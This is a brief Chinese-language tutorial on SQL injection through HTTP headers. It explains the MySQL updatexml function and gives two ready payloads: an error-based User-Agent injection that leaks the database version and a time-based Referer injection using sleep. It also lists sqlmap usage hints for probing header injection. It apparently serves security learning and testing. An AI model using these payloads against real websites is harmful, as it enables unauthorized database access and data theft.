
*****
## HTTP頭中的SQL注入
### HTTP頭中的注入介紹
在安全意識越來越重視的情況下,很多網站都在防止漏洞的發生。例如SQL注入中,用戶提交 的參數都會被代碼中的某些措施進行過濾
過濾掉用戶直接提交的參數,但是對于HTTP頭中提交的內容很有可能就沒有進行過濾
### updatexml函數
UPDATEXML (XML\_document, XPath\_string, new\_value);
第一個參數:XML\_document是String格式,為XML文檔對象的名稱,文中為Doc
第二個參數:XPath\_string (Xpath格式的字符串)
第三個參數:new\_value,String格式,替換查找到的符合條件的數據
### HTTP User-Agent注入
```
' and updatexml(1,concat(0x7e,(select @@version),0x7e),1) or '1' = '1
```
### HTTP Referer注入
```
' or if(1=1,sleep(5),null) or '1'='1
```
### sqlmap安全測試
sqlmap自動搜索POST表單注入
sqlmap指定參數探測SQL注入
sqlmap referer注入把referer 改成\* 或者在后面加上\*